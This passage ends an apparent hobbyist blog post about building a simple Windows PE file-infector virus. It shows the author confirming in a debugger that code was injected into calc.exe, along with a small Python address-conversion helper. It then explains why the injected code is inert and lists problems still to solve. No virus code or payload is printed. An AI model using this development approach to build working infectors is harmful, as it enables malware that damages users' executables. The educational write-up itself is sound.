Why is 0x00013000 used in the expression? Back in the tdump output I saw that value is the RVA of the virus segment. Adding it to the base address the infected PE was loaded at (0x00400000) gives the start of the virus code in memory.
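Both addresses used in the debugger come from the same arithmetic: a virtual address is the image base plus an RVA. A tiny Python sketch using the values from the tdump output quoted above (the `rva_to_va` and `format_va` helper names are my own, and it assumes the PE was loaded at its preferred base, as it was here):

```python
IMAGE_BASE = 0x00400000         # base address the infected calc.exe loaded at
ENTRY_POINT_RVA = 0x0000534E    # entry point RVA reported by tdump
VIRUS_SECTION_RVA = 0x00013000  # RVA of the new virus section


def rva_to_va(image_base, rva):
    """Convert a relative virtual address into an absolute virtual address."""
    return image_base + rva


def format_va(va):
    """Format an address the way it is written in this post."""
    return f"0x{va:08X}"


print(format_va(rva_to_va(IMAGE_BASE, ENTRY_POINT_RVA)))    # 0x0040534E
print(format_va(rva_to_va(IMAGE_BASE, VIRUS_SECTION_RVA)))  # 0x00413000
```

The second value is the same address that the "Go To" expression 00400000 + 00013000 evaluates to.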

Looking at the disassembly that was now in view let me quickly see that the right code was injected. The most obvious "tell" for me was the comparison with 0xFFFFFFFF done a few instructions after the start of the disassembly. That's the cmp eax, INVALID_FILE_HANDLE_VALUE instruction from line 61 of minijector.asm. Neat!

The combination of the tdump output, the hexdump output, and the state of the program at runtime in td32 all gave me confidence that I was on the right track.

Conclusion

Wow, that was a lot of work! Before getting too excited there are a few hard realities to face. First off, all of the code I injected is entirely inert. Since the entry point RVA wasn't changed it won't ever be run. There won't be a generation 2. Second, and more importantly, even if the code were run it wouldn't work! There are three important reasons why:

  1. It assumes it was loaded in the same location as generation 0/minijector.exe, not the new segment location in calc.exe!
  2. It references locations that were part of a data segment that wasn't copied to the infected file!
  3. It assumes the locations of all of the kernel32.dll Win32 API addresses that are used won't change from where they were for generation 0!

Why go through all the trouble of building a file infector that only infects once? Well, you have to start somewhere :-) This was the easiest way I could think to start out and it let me write a more "vanilla" program. The remaining problems help illustrate the unique requirements of virus code compared to normal program code. The solutions are quite interesting and unfortunately will have to wait until next time.

As always, I would love to hear feedback about this project. I'm finding it somewhat challenging to decide on what level of detail to share and what knowledge to assume (e.g. about general assembly programming) so thoughts here are particularly welcome! Feel free to drop me a line on Twitter (@cpu) or by email (daniel@binaryparadox.net).